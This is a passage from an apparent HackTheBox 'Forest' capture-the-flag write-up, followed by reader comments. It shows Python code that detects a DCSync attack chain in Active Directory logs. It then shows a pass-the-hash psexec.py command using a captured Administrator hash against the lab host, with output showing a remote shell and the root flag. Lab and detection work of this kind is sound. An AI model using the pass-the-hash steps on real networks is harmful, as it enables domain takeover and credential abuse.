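        if name == "sensitive_group_add":
            first_seen.setdefault(account, ev["Time"])
        elif (name == "replication_by_user_account" and account in first_seen
              and ev["Time"] - first_seen[account] <= window):
            alerts.append((ev["Time"], ev["EventID"], "dcsync_chain", account))
    return alerts


def at(hm):
    """Constructed timestamp helper: 'HH:MM' on the day of the writeup."""
    return datetime(2019, 11, 5, *map(int, hm.split(":")))


# Constructed, simplified records; field names follow the Security-log XML.
SAMPLE_EVENTS = [
    {"Time": at("09:50"), "EventID": 4728, "SubjectUserName": "lucinda",
     "TargetUserName": "Marketing", "MemberName": "CN=andy,CN=Users,DC=htb,DC=local"},
    {"Time": at("10:09"), "EventID": 4756, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"},
    {"Time": at("10:12"), "EventID": 5136, "SubjectUserName": "svc-alfresco",
     "ObjectDN": DOMAIN_HEAD, "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"Time": at("10:13"), "EventID": 4662, "SubjectUserName": "FOREST$",
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},  # normal DC replication
    {"Time": at("10:15"), "EventID": 4662, "SubjectUserName": "svc-alfresco",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The Marketing group change and the FOREST$ replication event are left alone; the three svc-alfresco events each raise an alert and together raise the correlated dcsync_chain alert.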

And so we have the password hash of htb.local\Administrator. I used impacket/wmiexec.py to pass the hash and get root.txt.

➜  forest psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file iBvMECpa.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service MKyb on 10.10.10.161.....
[*] Starting service MKyb.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
ype c:\Users\Administrator\Desktop\root.txt
f04-----------------129cc
PS C:\Windows\system32> 

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

0verflowme
8 months ago

PRO TIP: you could also use the “-request” option in GetNPUsers to get hashes of users without enumerating users 😉

nophone
Reply to 0verflowme
8 months ago

Need to browse to http://localhost/privexchange, and how do I do it? thx :-). I got root, but not in this way.


thom35
6 months ago

Why did you confidently say that svc-alfresco is a service account based on the enum4linux output?

Guest
6 months ago

Hello, when I browse to http://localhost/privexchange I get stuck on [*] Domain info dumped into lootdir! Yesterday it somehow worked, but I'm probably making the problem here. Do I have to install privexchange on localhost?
